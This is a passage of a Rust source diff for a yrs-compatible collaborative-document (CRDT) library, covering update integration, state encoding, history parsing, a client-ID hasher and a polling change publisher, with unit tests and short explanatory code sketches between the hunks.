store.repair(&mut item, self.store.clone(), &pending_types)?;
}
store.integrate(s, offset, None)?;
}
for (client, range) in update.delete_set_iter(store.get_state_vector()) {
store.delete_range(client, range)?;
}
if let Some(mut pending_update) = store.pending.take() {
if pending_update
.missing_state
.iter()
.any(|(client, clock)| *clock < store.get_state(*client))
{
// new update has been applied to the doc, need to re-integrate
retry = true;
}
for (client, range) in pending_update.delete_set_iter(store.get_state_vector()) {
store.delete_range(client, range)?;
}
if update.is_pending_empty() {
update = pending_update;
} else {
// drain all pending state to pending update for later iteration
update.drain_pending_state();
Update::merge_into(&mut update, [pending_update]);
}
} else {
// no pending update at store
// no pending update in current iteration
// thank god, all clean
if update.is_pending_empty() {
break;
} else {
// need to turn all pending state into update for later iteration
update.drain_pending_state();
retry = false;
};
}
// can't integrate any more, save the pending update
if !retry {
if !update.is_empty() {
store.pending.replace(update);
}
break;
}
}
if self.opts.gc {
store.optimize()?;
}
Ok(())
}
pub fn keys(&self) -> Vec<String> {
let store = self.store.read().unwrap();
store.types.keys().cloned().collect()
}
pub fn get_or_create_text<S: AsRef<str>>(&self, name: S) -> JwstCodecResult<Text> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Text)
.set_name(name.as_ref().to_string())
.build()
}
pub fn create_text(&self) -> JwstCodecResult<Text> {
YTypeBuilder::new(self.store.clone()).with_kind(YTypeKind::Text).build()
}
pub fn get_or_create_array<S: AsRef<str>>(&self, str: S) -> JwstCodecResult<Array> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Array)
.set_name(str.as_ref().to_string())
.build()
}
pub fn create_array(&self) -> JwstCodecResult<Array> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Array)
.build()
}
pub fn get_or_create_map<S: AsRef<str>>(&self, str: S) -> JwstCodecResult<Map> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Map)
.set_name(str.as_ref().to_string())
.build()
}
pub fn create_map(&self) -> JwstCodecResult<Map> {
YTypeBuilder::new(self.store.clone()).with_kind(YTypeKind::Map).build()
}
pub fn get_map(&self, str: &str) -> JwstCodecResult<Map> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Map)
.set_name(str.to_string())
.build_exists()
}
pub fn encode_update_v1(&self) -> JwstCodecResult<Vec<u8>> {
self.encode_state_as_update_v1(&StateVector::default())
}
pub fn encode_state_as_update_v1(&self, sv: &StateVector) -> JwstCodecResult<Vec<u8>> {
let update = self.encode_state_as_update(sv)?;
let mut encoder = RawEncoder::default();
update.write(&mut encoder)?;
Ok(encoder.into_inner())
}
pub fn encode_update(&self) -> JwstCodecResult<Update> {
self.encode_state_as_update(&StateVector::default())
}
pub fn encode_state_as_update(&self, sv: &StateVector) -> JwstCodecResult<Update> {
self.store.read().unwrap().diff_state_vector(sv, true)
}
pub fn get_state_vector(&self) -> StateVector {
self.store.read().unwrap().get_state_vector()
}
pub fn get_delete_sets(&self) -> DeleteSet {
self.store.read().unwrap().get_delete_sets()
}
#[cfg(feature = "events")]
pub fn subscribe(&self, cb: impl Fn(&[u8], &[History]) + Sync + Send + 'static) {
self.publisher.subscribe(cb);
}
#[cfg(feature = "events")]
pub fn unsubscribe_all(&self) {
self.publisher.unsubscribe_all();
}
#[cfg(feature = "events")]
pub fn subscribe_count(&self) -> usize {
self.publisher.count()
}
#[cfg(feature = "events")]
pub fn subscriber_count(&self) -> usize {
Arc::<DocPublisher>::strong_count(&self.publisher)
}
pub fn gc(&self) -> JwstCodecResult<()> {
self.store.write().unwrap().optimize()
}
}
#[cfg(test)]
mod tests {
use yrs::{Array, Map, Options, Transact, types::ToJson, updates::decoder::Decode};
use super::*;
#[test]
fn test_encode_state_as_update() {
let yrs_options_left = Options::default();
let yrs_options_right = Options::default();
loom_model!({
let (binary, binary_new) = if cfg!(miri) {
let doc = Doc::new();
let mut map = doc.get_or_create_map("abc").unwrap();
map.insert("a".to_string(), 1).unwrap();
let binary = doc.encode_update_v1().unwrap();
let doc_new = Doc::new();
let mut array = doc_new.get_or_create_array("array").unwrap();
array.insert(0, "array_value").unwrap();
let binary_new = doc.encode_update_v1().unwrap();
(binary, binary_new)
} else {
let yrs_doc = yrs::Doc::with_options(yrs_options_left.clone());
let map = yrs_doc.get_or_insert_map("abc");
let mut trx = yrs_doc.transact_mut();
map.insert(&mut trx, "a", 1);
let binary = trx.encode_update_v1();
let yrs_doc_new = yrs::Doc::with_options(yrs_options_right.clone());
let array = yrs_doc_new.get_or_insert_array("array");
let mut trx = yrs_doc_new.transact_mut();
array.insert(&mut trx, 0, "array_value");
let binary_new = trx.encode_update_v1();
(binary, binary_new)
};
let mut doc = Doc::try_from_binary_v1(binary).unwrap();
let mut doc_new = Doc::try_from_binary_v1(binary_new).unwrap();
let diff_update = doc_new.encode_state_as_update_v1(&doc.get_state_vector()).unwrap();
let diff_update_reverse = doc.encode_state_as_update_v1(&doc_new.get_state_vector()).unwrap();
doc.apply_update_from_binary_v1(diff_update).unwrap();
doc_new.apply_update_from_binary_v1(diff_update_reverse).unwrap();
assert_eq!(doc.encode_update_v1().unwrap(), doc_new.encode_update_v1().unwrap());
});
}
#[test]
#[cfg_attr(any(miri, loom), ignore)]
fn test_array_create() {
let yrs_options = yrs::Options::default();
let json = serde_json::json!([42.0, -42.0, true, false, "hello", "world", [1.0]]);
{
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_array("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, 42);
array.insert(&mut trx, 1, -42);
array.insert(&mut trx, 2, true);
array.insert(&mut trx, 3, false);
array.insert(&mut trx, 4, "hello");
array.insert(&mut trx, 5, "world");
let sub_array = yrs::ArrayPrelim::default();
let sub_array = array.insert(&mut trx, 6, sub_array);
sub_array.insert(&mut trx, 0, 1);
drop(trx);
let config = assert_json_diff::Config::new(assert_json_diff::CompareMode::Strict)
.numeric_mode(assert_json_diff::NumericMode::AssumeFloat);
assert_json_diff::assert_json_matches!(array.to_json(&doc.transact()), json, config);
};
{
let binary = {
let doc = Doc::new();
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, 42).unwrap();
array.insert(1, -42).unwrap();
array.insert(2, true).unwrap();
array.insert(3, false).unwrap();
array.insert(4, "hello").unwrap();
array.insert(5, "world").unwrap();
let mut sub_array = doc.create_array().unwrap();
array.insert(6, sub_array.clone()).unwrap();
// FIXME: the sub-array must be inserted into its parent first to stay compatible with yrs
sub_array.insert(0, 1).unwrap();
doc.encode_update_v1().unwrap()
};
let ydoc = yrs::Doc::with_options(yrs_options);
let array = ydoc.get_or_insert_array("abc");
let mut trx = ydoc.transact_mut();
trx.apply_update(yrs::Update::decode_v1(&binary).unwrap()).unwrap();
let config = assert_json_diff::Config::new(assert_json_diff::CompareMode::Strict)
.numeric_mode(assert_json_diff::NumericMode::AssumeFloat);
assert_json_diff::assert_json_matches!(array.to_json(&trx), json, config);
let mut doc = Doc::new();
let array = doc.get_or_create_array("abc").unwrap();
doc.apply_update_from_binary_v1(binary).unwrap();
let list = array.iter().collect::<Vec<_>>();
assert!(list.len() == 7);
assert!(matches!(list[6], Value::Array(_)));
}
{
let binary_detached = {
let doc = Doc::new();
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, 42).unwrap();
array.insert(1, -42).unwrap();
array.insert(2, true).unwrap();
array.insert(3, false).unwrap();
array.insert(4, "hello").unwrap();
array.insert(5, "world").unwrap();
let mut sub_array = doc.create_array().unwrap();
sub_array.insert(0, 1).unwrap();
array.insert(6, sub_array.clone()).unwrap();
doc.encode_update_v1().unwrap()
};
let detached_doc = Doc::try_from_binary_v1(binary_detached).unwrap();
let detached_array = detached_doc.get_or_create_array("abc").unwrap();
let detached_sub_array = match detached_array.get(6).unwrap() {
Value::Array(arr) => arr,
_ => panic!("expected array at index 6"),
};
assert_eq!(detached_sub_array.get(0).unwrap(), Value::Any(1.0.into()));
}
}
#[test]
#[cfg(feature = "events")]
#[ignore = "inaccurate timing on ci, need for more accurate timing testing"]
fn test_subscribe() {
use crate::sync::{AtomicU8, Ordering};
loom_model!({
let doc = Doc::default();
let doc_clone = doc.clone();
let count = Arc::new(AtomicU8::new(0));
let count_clone1 = count.clone();
let count_clone2 = count.clone();
doc.subscribe(move |_, _| {
count_clone1.fetch_add(1, Ordering::SeqCst);
});
doc_clone.subscribe(move |_, _| {
count_clone2.fetch_add(1, Ordering::SeqCst);
});
doc_clone.get_or_create_array("abc").unwrap().insert(0, 42).unwrap();
// wait for the observer, which cycles once every 100ms
std::thread::sleep(std::time::Duration::from_millis(200));
assert_eq!(count.load(Ordering::SeqCst), 2);
});
}
#[test]
fn test_repeated_applied_pending_update() {
// generate a pending update
// update: [1, 1, 1, 0, 39, 1, 4, 116, 101, 115, 116, 3, 109, 97, 112, 1, 0]
// update: [1, 1, 1, 1, 40, 0, 1, 0, 11, 115, 117, 98, 95, 109, 97, 112, 95,
// 107, 101, 121, 1, 119, 13, 115, 117, 98, 95, 109, 97, 112, 95, 118, 97, 108,
// 117, 101, 0]
// {
// let doc1 = Doc::default();
// doc1.subscribe(|update| {
// println!("update: {:?}", update);
// });
// let mut map = doc1.get_or_create_map("test").unwrap();
// std::thread::sleep(std::time::Duration::from_millis(500));
// let mut sub_map = doc1.create_map().unwrap();
// map.insert("map", sub_map.clone()).unwrap();
// std::thread::sleep(std::time::Duration::from_millis(500));
// sub_map.insert("sub_map_key", "sub_map_value").unwrap();
// std::thread::sleep(std::time::Duration::from_millis(500));
// }
loom_model!({
let mut doc = Doc::default();
doc
.apply_update_from_binary_v1(vec![
1, 1, 1, 1, 40, 0, 1, 0, 11, 115, 117, 98, 95, 109, 97, 112, 95, 107, 101, 121, 1, 119, 13, 115, 117, 98, 95,
109, 97, 112, 95, 118, 97, 108, 117, 101, 0,
])
.unwrap();
let pending_size = doc
.store
.read()
.unwrap()
.pending
.as_ref()
.unwrap()
.structs
.iter()
.map(|s| s.1.len())
.sum::<usize>();
doc
.apply_update_from_binary_v1(vec![
1, 1, 1, 1, 40, 0, 1, 0, 11, 115, 117, 98, 95, 109, 97, 112, 95, 107, 101, 121, 1, 119, 13, 115, 117, 98, 95,
109, 97, 112, 95, 118, 97, 108, 117, 101, 0,
])
.unwrap();
// pending nodes should not grow after applying the same pending update again
assert_eq!(
pending_size,
doc
.store
.read()
.unwrap()
.pending
.as_ref()
.unwrap()
.structs
.iter()
.map(|s| s.1.len())
.sum::<usize>()
);
});
}
#[test]
fn test_update_from_vec_ref() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
text.insert(0, "hello world").unwrap();
let mut root = doc.get_or_create_map("root").unwrap();
let mut child = doc.create_map().unwrap();
child.insert("k".to_string(), "v").unwrap();
root.insert("child".to_string(), child.clone()).unwrap();
let update = doc.encode_update_v1().unwrap();
let doc = Doc::try_from_binary_v1(update).unwrap();
let text = doc.get_or_create_text("text").unwrap();
assert_eq!(&text.to_string(), "hello world");
let root = doc.get_or_create_map("root").unwrap();
if let Some(Value::Map(child)) = root.get("child") {
assert!(
matches!(child.get("k"), Some(Value::Any(Any::String(s))) if s == "v"),
"expected nested map value to survive apply_update"
);
} else {
panic!("expected nested map to survive apply_update");
}
});
}
#[test]
#[cfg_attr(any(miri, loom), ignore)]
fn test_apply_update() {
let updates = [
include_bytes!("../fixtures/basic.bin").to_vec(),
include_bytes!("../fixtures/database.bin").to_vec(),
include_bytes!("../fixtures/large.bin").to_vec(),
include_bytes!("../fixtures/with-subdoc.bin").to_vec(),
include_bytes!("../fixtures/edge-case-left-right-same-node.bin").to_vec(),
];
for update in updates {
let mut doc = Doc::new();
doc.apply_update_from_binary_v1(&update).unwrap();
}
}
}
@@ -1,35 +0,0 @@
use std::{
collections::HashMap,
hash::{BuildHasher, Hasher},
};
use super::Client;
#[derive(Default)]
pub struct ClientHasher(Client);
impl Hasher for ClientHasher {
fn finish(&self) -> u64 {
self.0
}
fn write(&mut self, _: &[u8]) {}
fn write_u64(&mut self, i: u64) {
self.0 = i
}
}
#[derive(Default, Clone)]
pub struct ClientHasherBuilder;
impl BuildHasher for ClientHasherBuilder {
type Hasher = ClientHasher;
fn build_hasher(&self) -> Self::Hasher {
ClientHasher::default()
}
}
// use ClientID as key
pub type ClientMap<V> = HashMap<Client, V, ClientHasherBuilder>;
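// `ClientHasher` above stores the `u64` key itself as the hash, skipping any
// mixing step. A self-contained sketch of the same idea using only std, with
// hypothetical names (`IdentityHasher`, `IdentityBuildHasher`,
// `SketchClientMap`). It assumes the keys are `u64` values that are already
// reasonably spread out; other key types would hash to 0 here because `write`
// ignores its input.

```rust
use std::collections::HashMap;
use std::hash::{BuildHasher, Hasher};

// Hypothetical pass-through hasher: the last `u64` written becomes the hash.
#[derive(Default)]
struct IdentityHasher(u64);

impl Hasher for IdentityHasher {
    fn finish(&self) -> u64 {
        self.0
    }

    // Byte-slice input is ignored; only `write_u64` contributes.
    fn write(&mut self, _: &[u8]) {}

    fn write_u64(&mut self, i: u64) {
        self.0 = i;
    }
}

#[derive(Default, Clone)]
struct IdentityBuildHasher;

impl BuildHasher for IdentityBuildHasher {
    type Hasher = IdentityHasher;

    fn build_hasher(&self) -> IdentityHasher {
        IdentityHasher::default()
    }
}

type SketchClientMap<V> = HashMap<u64, V, IdentityBuildHasher>;

// Runs one key through the hasher to show that the hash equals the key.
fn identity_hash(key: u64) -> u64 {
    let mut hasher = IdentityBuildHasher.build_hasher();
    hasher.write_u64(key);
    hasher.finish()
}

fn sketch_client_map() -> SketchClientMap<&'static str> {
    let mut map: SketchClientMap<&'static str> = HashMap::default();
    map.insert(42, "alice");
    map.insert(7, "bob");
    map
}
```

// The map behaves like any other `HashMap`; only the hashing cost changes.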
@@ -1,316 +0,0 @@
use std::{collections::VecDeque, sync::Arc};
use serde::{Deserialize, Serialize};
use super::{store::StoreRef, *};
use crate::sync::RwLock;
enum ParentNode {
Root(String),
Node(Somr<Item>),
Unknown,
}
#[derive(Clone, Default)]
pub struct HistoryOptions {
pub client: Option<u64>,
/// Only available when client is set
pub skip: Option<usize>,
/// Only available when client is set
pub limit: Option<usize>,
}
#[derive(Debug, Clone, Default)]
pub struct StoreHistory {
store: StoreRef,
parents: Arc<RwLock<HashMap<Id, Somr<Item>>>>,
}
impl StoreHistory {
pub(crate) fn new(store: &StoreRef) -> Self {
Self {
store: store.clone(),
..Default::default()
}
}
pub fn resolve(&self) {
let store = self.store.read().unwrap();
self.resolve_with_store(&store);
}
pub(crate) fn resolve_with_store(&self, store: &DocStore) {
let mut parents = self.parents.write().unwrap();
for node in store.items.values().flat_map(|items| items.iter()) {
let node = node.as_item();
if let Some(item) = node.get() {
parents
.entry(item.id)
.and_modify(|e| {
if *e != node {
*e = node.clone();
}
})
.or_insert(node.clone());
}
}
}
pub fn parse_update(&self, update: &Update) -> Vec<History> {
let store_items = SortedNodes::new(update.structs.iter().collect::<Vec<_>>())
.filter_map(|n| n.as_item().get().cloned())
.collect::<Vec<_>>();
// borrow the items as references
let mut store_items = store_items.iter().collect::<Vec<_>>();
store_items.sort_by_key(|item| item.id.clock);
self.parse_items(store_items)
}
pub fn parse_delete_sets(&self, old_sets: &ClientMap<OrderRange>, new_sets: &ClientMap<OrderRange>) -> Vec<History> {
let store = self.store.read().unwrap();
let deleted_items = new_sets
.iter()
.filter_map(|(id, new_range)| {
// diff range if old range exists, or use new range
let range = old_sets
.get(id)
.map(|r| r.diff_range(new_range).into())
.unwrap_or(new_range.clone());
(!range.is_empty()).then_some((id, range))
})
.filter_map(|(client, range)| {
// collect the items that fall inside the deleted range
store.items.get(client).map(move |items| {
items
.iter()
.filter(move |i| range.contains(i.clock()))
.filter_map(|i| i.as_item().get().cloned())
})
})
.flatten()
.collect();
self.parse_deleted_items(deleted_items)
}
pub fn parse_store(&self, options: HistoryOptions) -> Vec<History> {
let store_items = {
let client = options
.client
.as_ref()
.and_then(|client| client.ne(&0).then_some(client));
let store = self.store.read().unwrap();
let mut sort_iter: Box<dyn Iterator<Item = Item>> = Box::new(
SortedNodes::new(if let Some(client) = client {
store.items.get(client).map(|i| vec![(client, i)]).unwrap_or_default()
} else {
store.items.iter().collect::<Vec<_>>()
})
.filter_map(|n| n.as_item().get().cloned()),
);
if client.is_some() {
// skip and limit only available when client is set
if let Some(skip) = options.skip {
sort_iter = Box::new(sort_iter.skip(skip));
}
if let Some(limit) = options.limit {
sort_iter = Box::new(sort_iter.take(limit));
}
}
sort_iter.collect::<Vec<_>>()
};
// borrow the items as references
let mut store_items = store_items.iter().collect::<Vec<_>>();
store_items.sort_by_key(|item| item.id.clock);
self.parse_items(store_items)
}
fn parse_items(&self, store_items: Vec<&Item>) -> Vec<History> {
let parents = self.parents.read().unwrap();
let mut histories = vec![];
for item in store_items {
if item.deleted() {
continue;
}
histories.push(History {
id: item.id.to_string(),
parent: Self::parse_path(item, &parents),
content: Value::from(&item.content).to_string(),
action: HistoryAction::Update,
})
}
histories
}
fn parse_deleted_items(&self, deleted_items: Vec<Item>) -> Vec<History> {
let parents = self.parents.read().unwrap();
let mut histories = vec![];
for item in deleted_items {
histories.push(History {
id: item.id.to_string(),
parent: Self::parse_path(&item, &parents),
content: Value::from(&item.content).to_string(),
action: HistoryAction::Delete,
})
}
histories
}
fn parse_path(item: &Item, parents: &HashMap<Id, Somr<Item>>) -> Vec<String> {
let mut path = Vec::new();
let mut cur = item.clone();
while let Some(node) = cur.find_node_with_parent_info() {
path.push(Self::get_node_name(&node));
match Self::get_parent(parents, &node.parent) {
ParentNode::Root(name) => {
path.push(name);
break;
}
ParentNode::Node(parent) => {
if let Some(parent) = parent.get() {
cur = parent.clone();
} else {
break;
}
}
ParentNode::Unknown => {
break;
}
}
}
path.reverse();
path
}
fn get_node_name(item: &Item) -> String {
if let Some(name) = item.parent_sub.clone() {
name.to_string()
} else {
let mut curr = item.clone();
let mut idx = 0;
while let Some(item) = curr.left.get() {
curr = item.clone();
idx += 1;
}
idx.to_string()
}
}
fn get_parent(parents: &HashMap<Id, Somr<Item>>, parent: &Option<Parent>) -> ParentNode {
match parent {
None => ParentNode::Unknown,
Some(Parent::Type(ptr)) => ptr
.ty()
.and_then(|ty| {
ty.item
.get()
.and_then(|i| parents.get(&i.id).map(|p| ParentNode::Node(p.clone())))
.or(ty.root_name.clone().map(ParentNode::Root))
})
.unwrap_or(ParentNode::Unknown),
Some(Parent::String(name)) => ParentNode::Root(name.to_string()),
Some(Parent::Id(id)) => parents
.get(id)
.map(|p| ParentNode::Node(p.clone()))
.unwrap_or(ParentNode::Unknown),
}
}
}
#[derive(Debug, Serialize, Deserialize, PartialEq)]
pub enum HistoryAction {
Insert,
Update,
Delete,
}
#[derive(Debug, Serialize, Deserialize, PartialEq)]
pub struct History {
pub id: String,
pub parent: Vec<String>,
pub content: String,
pub action: HistoryAction,
}
pub(crate) struct SortedNodes<'a> {
nodes: Vec<(&'a Client, &'a VecDeque<Node>)>,
current: Option<VecDeque<Node>>,
}
impl<'a> SortedNodes<'a> {
pub fn new(mut nodes: Vec<(&'a Client, &'a VecDeque<Node>)>) -> Self {
nodes.sort_by(|a, b| b.0.cmp(a.0));
let current = nodes.pop().map(|(_, v)| v.clone());
Self { nodes, current }
}
}
impl Iterator for SortedNodes<'_> {
type Item = Node;
fn next(&mut self) -> Option<Self::Item> {
if let Some(current) = self.current.as_mut()
&& let Some(node) = current.pop_back()
{
return Some(node);
}
if let Some((_, nodes)) = self.nodes.pop() {
self.current = Some(nodes.clone());
self.next()
} else {
None
}
}
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn parse_history_client_test() {
loom_model!({
let doc = Doc::default();
let mut map = doc.get_or_create_map("map").unwrap();
let mut sub_map = doc.create_map().unwrap();
map.insert("sub_map".to_string(), sub_map.clone()).unwrap();
sub_map.insert("key".to_string(), "value").unwrap();
assert_eq!(doc.clients()[0], doc.client());
});
}
#[test]
fn parse_history_test() {
loom_model!({
let doc = Doc::default();
let mut map = doc.get_or_create_map("map").unwrap();
let mut sub_map = doc.create_map().unwrap();
map.insert("sub_map".to_string(), sub_map.clone()).unwrap();
sub_map.insert("key".to_string(), "value").unwrap();
let history = StoreHistory::new(&doc.store);
let update = doc.encode_update().unwrap();
assert_eq!(history.parse_store(Default::default()), history.parse_update(&update,));
});
}
}
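// The iteration order of `SortedNodes` above is not obvious at first read:
// clients come out in ascending order, and each client's queue is drained
// from the back. A minimal sketch with `u32` values standing in for `Node`;
// `SketchSorted` and `sketch_order` are hypothetical names, and the sketch
// uses a loop where the original recurses.

```rust
use std::collections::VecDeque;

// Hypothetical stand-in for `SortedNodes`, with `u32` items instead of `Node`.
struct SketchSorted<'a> {
    remaining: Vec<(&'a u64, &'a VecDeque<u32>)>,
    current: Option<VecDeque<u32>>,
}

impl<'a> SketchSorted<'a> {
    fn new(mut groups: Vec<(&'a u64, &'a VecDeque<u32>)>) -> Self {
        // Sort descending so that `pop` hands out the smallest client first.
        groups.sort_by(|a, b| b.0.cmp(a.0));
        let current = groups.pop().map(|(_, items)| items.clone());
        Self {
            remaining: groups,
            current,
        }
    }
}

impl Iterator for SketchSorted<'_> {
    type Item = u32;

    fn next(&mut self) -> Option<u32> {
        loop {
            // Drain the current queue from the back.
            if let Some(item) = self.current.as_mut().and_then(|c| c.pop_back()) {
                return Some(item);
            }
            // Current queue is exhausted: move on to the next client, if any.
            let (_, next_group) = self.remaining.pop()?;
            self.current = Some(next_group.clone());
        }
    }
}

fn sketch_order() -> Vec<u32> {
    let client_one: VecDeque<u32> = VecDeque::from([10, 11]);
    let client_two: VecDeque<u32> = VecDeque::from([20, 21]);
    // Deliberately passed out of order; the constructor sorts by client id.
    let groups = vec![(&2u64, &client_two), (&1u64, &client_one)];
    SketchSorted::new(groups).collect()
}
```

// Because each queue is reversed on the way out, the callers above re-sort the
// collected items by clock before parsing them.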
@@ -1,36 +0,0 @@
mod awareness;
mod batch;
mod codec;
mod common;
mod document;
mod hasher;
mod history;
#[cfg(feature = "events")]
mod publisher;
mod store;
mod types;
mod utils;
pub use ahash::{HashMap, HashMapExt, HashSet, HashSetExt};
pub use awareness::{Awareness, AwarenessEvent};
pub use batch::{Batch, batch_commit};
pub use codec::*;
pub use common::*;
pub use document::{Doc, DocOptions};
pub use hasher::ClientMap;
pub use history::{History, HistoryOptions, StoreHistory};
use smol_str::SmolStr;
pub(crate) use store::DocStore;
pub use types::*;
pub use utils::*;
use super::*;
/// NOTE:
/// - We do not call [HashMap::with_capacity(num_of_clients)] directly here
/// because the input data is untrusted.
/// - For instance, the leading u64 could be set to a very large value.
/// - Pre-allocating a HashMap with that capacity could cause an OOM.
/// - A safer approach is to cap the initial allocation at 1024 entries and
/// let std grow the map as needed.
pub const HASHMAP_SAFE_CAPACITY: usize = 1 << 10;
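// The note above describes capping the first allocation when a length prefix
// comes from untrusted input. A minimal sketch of that pattern with std only;
// `SAFE_CAPACITY` and `read_pairs` are hypothetical names, and an iterator
// stands in for the decoder used elsewhere in this crate.

```rust
use std::collections::HashMap;

// Same value as the constant above; renamed to mark it as part of the sketch.
const SAFE_CAPACITY: usize = 1 << 10;

// `declared_len` models a length prefix read from untrusted bytes.
// The map is pre-sized to at most `SAFE_CAPACITY` entries and grows on demand
// if the input really does contain more pairs.
fn read_pairs(
    declared_len: usize,
    pairs: impl Iterator<Item = (u64, u64)>,
) -> HashMap<u64, u64> {
    let mut map = HashMap::with_capacity(declared_len.min(SAFE_CAPACITY));
    // Simplification: a short input just ends the loop here, whereas a real
    // decoder would report an error when it runs out of bytes.
    for (client, clock) in pairs.take(declared_len) {
        map.insert(client, clock);
    }
    map.shrink_to_fit();
    map
}
```

// With this cap, a forged prefix such as `usize::MAX` costs no more up-front
// memory than a prefix of 1024.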
@@ -1,239 +0,0 @@
use std::{
thread::{current, sleep, spawn},
time::Duration,
};
use log::{debug, trace};
use super::{history::StoreHistory, store::StoreRef, *};
use crate::sync::{Arc, AtomicBool, Mutex, Ordering, RwLock};
pub type DocSubscriber = Box<dyn Fn(&[u8], &[History]) + Sync + Send + 'static>;
const OBSERVE_INTERVAL: u64 = 100;
pub struct DocPublisher {
store: StoreRef,
history: StoreHistory,
subscribers: Arc<RwLock<Vec<DocSubscriber>>>,
observer: Arc<Mutex<Option<std::thread::JoinHandle<()>>>>,
observing: Arc<AtomicBool>,
}
impl DocPublisher {
pub(crate) fn new(store: StoreRef) -> Self {
let subscribers = Arc::new(RwLock::new(Vec::<DocSubscriber>::new()));
let history = StoreHistory::new(&store);
history.resolve();
let publisher = Self {
store,
history,
subscribers,
observer: Arc::default(),
observing: Arc::new(AtomicBool::new(false)),
};
if cfg!(all(
feature = "subscribe",
not(any(feature = "bench", fuzzing, loom, miri))
)) {
publisher.start();
}
publisher
}
pub fn start(&self) {
let mut observer = self.observer.lock().unwrap();
let observing = self.observing.clone();
let store = self.store.clone();
let history = self.history.clone();
if observer.is_none() {
let thread_subscribers = self.subscribers.clone();
observing.store(true, Ordering::Release);
debug!("start observing");
let thread = spawn(move || {
let mut last_update = store.read().unwrap().get_state_vector();
let mut last_deletes = store.read().unwrap().delete_set.clone();
loop {
sleep(Duration::from_millis(OBSERVE_INTERVAL));
if !observing.load(Ordering::Acquire) {
debug!("stop observing");
break;
}
let subscribers = thread_subscribers.read().unwrap();
if subscribers.is_empty() {
continue;
}
let store = store.read().unwrap();
let update = store.get_state_vector();
let deletes = store.delete_set.clone();
if update != last_update || deletes != last_deletes {
trace!(
"update: {:?}, last_update: {:?}, {:?}",
update,
last_update,
current().id(),
);
trace!(
"deletes: {:?}, last_deletes: {:?}, {:?}",
deletes,
last_deletes,
current().id(),
);
history.resolve_with_store(&store);
let (binary, history) = match store.diff_state_vector(&last_update, false) {
Ok(update) => {
drop(store);
let history = history
.parse_update(&update)
.into_iter()
.chain(history.parse_delete_sets(&last_deletes, &deletes))
.collect::<Vec<_>>();
let mut encoder = RawEncoder::default();
if let Err(e) = update.write(&mut encoder) {
warn!("Failed to encode document: {e}");
continue;
}
(encoder.into_inner(), history)
}
Err(e) => {
warn!("Failed to diff document: {e}");
continue;
}
};
last_update = update;
last_deletes = deletes;
for cb in subscribers.iter() {
use std::panic::{AssertUnwindSafe, catch_unwind};
// catch the panic if a subscriber callback panics
catch_unwind(AssertUnwindSafe(|| {
cb(&binary, &history);
}))
.unwrap_or_else(|e| {
warn!("Failed to call subscriber: {e:?}");
});
}
} else {
drop(store);
}
}
});
observer.replace(thread);
} else {
debug!("already observing");
}
}
pub fn stop(&self) {
let mut observer = self.observer.lock().unwrap();
if let Some(observer) = observer.take() {
self.observing.store(false, Ordering::Release);
observer.join().unwrap();
}
}
pub(crate) fn count(&self) -> usize {
self.subscribers.read().unwrap().len()
}
pub(crate) fn subscribe(&self, subscriber: impl Fn(&[u8], &[History]) + Send + Sync + 'static) {
self.subscribers.write().unwrap().push(Box::new(subscriber));
}
pub(crate) fn unsubscribe_all(&self) {
self.subscribers.write().unwrap().clear();
}
}
impl std::fmt::Debug for DocPublisher {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("DocPublisher").finish()
}
}
impl Drop for DocPublisher {
fn drop(&mut self) {
self.stop();
self.unsubscribe_all();
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::sync::AtomicUsize;
#[test]
fn test_parse_update_history() {
loom_model!({
let doc = Doc::default();
let ret = [
vec![vec!["(1, 0)", "test.key1", "val1"]],
vec![vec!["(1, 1)", "test.key2", "val2"], vec!["(1, 2)", "test.key3", "val3"]],
vec![
vec!["(1, 3)", "array.0", "val1"],
vec!["(1, 4)", "array.1", "val2"],
vec!["(1, 5)", "array.2", "val3"],
],
];
let cycle = Arc::new(AtomicUsize::new(0));
// update: 24
// history change by (1, 0) at test.key1: val1
// update: 43
// history change by (1, 1) at test.key2: val2
// history change by (1, 2) at test.key3: val3
// update: 40
// history change by (1, 3) at array.0: val1
// history change by (1, 4) at array.1: val2
// history change by (1, 5) at array.2: val3
doc.subscribe(move |u, history| {
println!("update: {}", u.len());
let cycle = cycle.fetch_add(1, Ordering::SeqCst);
let ret = ret[cycle].clone();
for (i, h) in history.iter().enumerate() {
println!("history change by {} at {}: {}", h.id, h.parent.join("."), h.content);
// the first update is lost for an unknown reason under ASan, so skip the assertions when ASan is enabled
if option_env!("ASAN_OPTIONS").is_none() {
let ret = &ret[i];
assert_eq!(h.id, ret[0]);
assert_eq!(h.parent.join("."), ret[1]);
assert_eq!(h.content, ret[2]);
}
}
});
sleep(Duration::from_millis(500));
let mut map = doc.get_or_create_map("test").unwrap();
map.insert("key1".to_string(), "val1").unwrap();
sleep(Duration::from_millis(500));
map.insert("key2".to_string(), "val2").unwrap();
map.insert("key3".to_string(), "val3").unwrap();
sleep(Duration::from_millis(500));
let mut array = doc.get_or_create_array("array").unwrap();
array.push("val1").unwrap();
array.push("val2").unwrap();
array.push("val3").unwrap();
sleep(Duration::from_millis(500));
doc.publisher.stop();
});
}
}
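The publisher above polls the store on a fixed interval and stops when an atomic flag is cleared and the thread is joined. The same start/stop pattern can be sketched with the standard library alone. `Poller`, its fields, and the `AtomicU64` source are hypothetical stand-ins, not the crate's API:

```rust
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::sync::{Arc, Mutex};
use std::thread::{sleep, spawn, JoinHandle};
use std::time::Duration;

/// Hypothetical stand-in for `DocPublisher`: polls a shared counter and
/// records every change it observes.
struct Poller {
    observing: Arc<AtomicBool>,
    handle: Mutex<Option<JoinHandle<()>>>,
}

impl Poller {
    fn start(source: Arc<AtomicU64>, seen: Arc<Mutex<Vec<u64>>>, interval: Duration) -> Self {
        let observing = Arc::new(AtomicBool::new(true));
        let flag = observing.clone();
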